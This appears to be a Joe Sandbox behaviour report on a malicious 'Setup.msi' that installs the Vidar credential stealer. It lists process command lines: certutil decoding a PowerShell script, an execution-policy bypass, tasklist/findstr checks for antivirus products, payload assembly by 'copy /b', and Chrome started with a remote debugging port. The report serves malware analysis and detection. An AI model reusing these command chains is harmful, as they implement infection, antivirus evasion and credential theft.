                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:11:28:01
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi"
                                                                                                                                                                                                                                                  Imagebase:0x7ff79ff50000
                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:11:28:03
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                  Imagebase:0x7ff79ff50000
                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:11:28:04
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 50B4D686C01703530B412DCED2DB0D4F C
                                                                                                                                                                                                                                                  Imagebase:0x450000
                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:11:28:14
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E4D759A8E406C9ACB7BC72DE0FA3790E
                                                                                                                                                                                                                                                  Imagebase:0x450000
                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Installer\MSI64FB.tmp
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat"
                                                                                                                                                                                                                                                  Imagebase:0x7ff749f40000
                                                                                                                                                                                                                                                  File size:548'192 bytes
                                                                                                                                                                                                                                                  MD5 hash:250DA78FACCE68224B24D0FFAD65CA8E
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" "
                                                                                                                                                                                                                                                  Imagebase:0x7ff7b3350000
                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1
                                                                                                                                                                                                                                                  Imagebase:0x7ff689a60000
                                                                                                                                                                                                                                                  File size:1'651'712 bytes
                                                                                                                                                                                                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:11:28:15
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7a05b0000
                                                                                                                                                                                                                                                  File size:161'280 bytes
                                                                                                                                                                                                                                                  MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:11:28:16
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"
                                                                                                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:11:28:16
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                  Start time:11:28:20
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                  Start time:11:28:34
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\putt.exe"
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:978'099 bytes
                                                                                                                                                                                                                                                  MD5 hash:27B18A5E8BDAA950AF93633A821C2BFA
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

Target ID:17
Start time:11:28:35
Start date:17/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:11:28:35
Start date:17/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:11:28:37
Start date:17/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xe60000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:11:28:37
Start date:17/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x30000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:11:28:38
Start date:17/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xe60000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:11:28:38
Start date:17/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x30000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:11:28:39
Start date:17/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 628056
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:11:28:39
Start date:17/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "Cleared" Penalties
Imagebase:0x30000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:11:28:39
Start date:17/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:11:28:39
Start date:17/12/2024
Path:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Wow64 process (32bit):true
Commandline:Corrections.com u
Imagebase:0xf40000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:false

Target ID:27
Start time:11:28:40
Start date:17/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0xb60000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:11:29:17
Start date:17/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:11:29:18
Start date:17/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff6eef20000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:11:29:18
Start date:17/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2408,i,649146787284632151,17109937592652742530,262144 /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:1.3%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:14.6%
Total number of Nodes:314
Total number of Limit Nodes:15

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Process$CreateCurrentDirectoryFreeInitializeInstanceLocalOpenTokenUninitializeWindows
• String ID:
• API String ID: 822888269-0
• Opcode ID: 05dfd14b6fad02eb0e5439a3471fccad0f1740c3acfe04560c7ae6758e09d47f
• Instruction ID: 28d97d023186a8528c005a2be7f23ba3889977bdfd6332fb528d13ee773127e1
• Opcode Fuzzy Hash: 05dfd14b6fad02eb0e5439a3471fccad0f1740c3acfe04560c7ae6758e09d47f
• Instruction Fuzzy Hash: 58226B22B0DB82C9EB10BF65D8507A9A3B0FB95B98F905132DA4D57BA8DF3CE545C310

Control-flow Graph

APIs
• LoadLibraryExW.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F90FE5
• GetLastError.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F90FF7
• LoadLibraryExW.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F91039
• VirtualProtect.KERNELBASE ref: 00007FF749F91095
• VirtualProtect.KERNELBASE ref: 00007FF749F910C6
• FreeLibrary.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F9110A
• GetProcAddress.KERNEL32(?,00000000,00000000,00007FF749F9180E,?,?,?,00007FF749F91791), ref: 00007FF749F91116
Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
• String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
• API String ID: 740688525-1880043860
• Opcode ID: a892a654b5abf7ec54ac486c8a32eee7bee7496938f6da5fac79cc0bf8a6e840
• Instruction ID: 1ee42c2ee62e5709caa6cc17a508fbda8895bdb6e443f00226cfee4a6a447006
• Opcode Fuzzy Hash: a892a654b5abf7ec54ac486c8a32eee7bee7496938f6da5fac79cc0bf8a6e840
• Instruction Fuzzy Hash: A951AC21F0C646D1EB55BF56A8009B9A2B0AF4ABB4F981734DE3D077E4EF3CE4458220

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode ID: 83c2ad7f33d6766a2455fcf55cb19f89b58c7c6f92fe8b6ef7896216a17a9331
• Instruction ID: 6391b48bffe0d597138582d96e2fe16dbd1786697e5d73f69c680d404841e5c1
• Opcode Fuzzy Hash: 83c2ad7f33d6766a2455fcf55cb19f89b58c7c6f92fe8b6ef7896216a17a9331
• Instruction Fuzzy Hash: 0801283271CA82C3EB50AF51E44439AB3B0FB91744F944026EB8D43A98CF7DC519CB14

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: AllocCommandLineLocal
• String ID: Full command line:
• API String ID: 2661623471-831861440
• Opcode ID: 10fe9c3086584ecdcabbb76e3bc630f7c0bbf28254d0d94bbd84ecf09f4de2d3
• Instruction ID: 1c1169bfb27638f90c106a907cbcb376aed5eb2a2b70bf3efc5cb5877f88c050
• Opcode Fuzzy Hash: 10fe9c3086584ecdcabbb76e3bc630f7c0bbf28254d0d94bbd84ecf09f4de2d3
• Instruction Fuzzy Hash: 0D417D12A5CA82E1EB00FF64D4515FEA370EFA0398FC05431EA4E57ADAEE6CD645C720

Control-flow Graph

APIs
• GetTokenInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF749F47D7A), ref: 00007FF749F47DE1
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF749F47D7A), ref: 00007FF749F47DEB
• GetTokenInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF749F47D7A), ref: 00007FF749F47E5F
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: InformationToken$ErrorLast
• String ID:
• API String ID: 2567405617-0
• Opcode ID: 81ab0e5410798fe9c69e99d4eda4d9889cd92e25074a5a686ed3b1c35950dab2
• Instruction ID: 27a7c53f51e774f9b4a65698d6836e2d5b988282e90767695b89632c16157046
• Opcode Fuzzy Hash: 81ab0e5410798fe9c69e99d4eda4d9889cd92e25074a5a686ed3b1c35950dab2
• Instruction Fuzzy Hash: BE216D32B18B81CAE740AF25E54066AB3B5FB98BC4F648231DB4D43B98DF3CE4518B10

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: __scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3070443116-0
• Opcode ID: 6cee35d11a79b8bb1112fc6f745af27cbdf9ac5f6833fa79e76764f6e9b4bfe5
• Instruction ID: dc8642de56a9548e49abe7ab9abd8a607fac71899a024b2490fd87ce7550098c
• Opcode Fuzzy Hash: 6cee35d11a79b8bb1112fc6f745af27cbdf9ac5f6833fa79e76764f6e9b4bfe5
• Instruction Fuzzy Hash: 7F310421E1C542D5FB54BF64A4A53F9E2B1AF41354FC458B4FA0E5B2D3DE2CE8058270

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: Initialize_invalid_parameter_noinfo_set_fmode
• String ID:
• API String ID: 3548387204-0
• Opcode ID: b1e6c70da2e61cc17f3a455e4fd642551ce0edfef17335b2559a393fc4bb5622
• Instruction ID: 8f9bf833a1cf82a683a6f06853d28de1f54ee8b3498747409755bfcc6da86065
• Opcode Fuzzy Hash: b1e6c70da2e61cc17f3a455e4fd642551ce0edfef17335b2559a393fc4bb5622
• Instruction Fuzzy Hash: F3117610E2D153D1FB98BFB148A62B9C2B15F90354FD508B8FA0D962C3EE6CE8554272

Control-flow Graph

APIs
• GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF749F8C16A,?,?,?,00007FF749F8C436,?,?,?,?,00007FF749F9A3C0,?,?,?), ref: 00007FF749F950EC
• FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF749F8C16A,?,?,?,00007FF749F8C436,?,?,?,?,00007FF749F9A3C0,?,?,?), ref: 00007FF749F95156
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
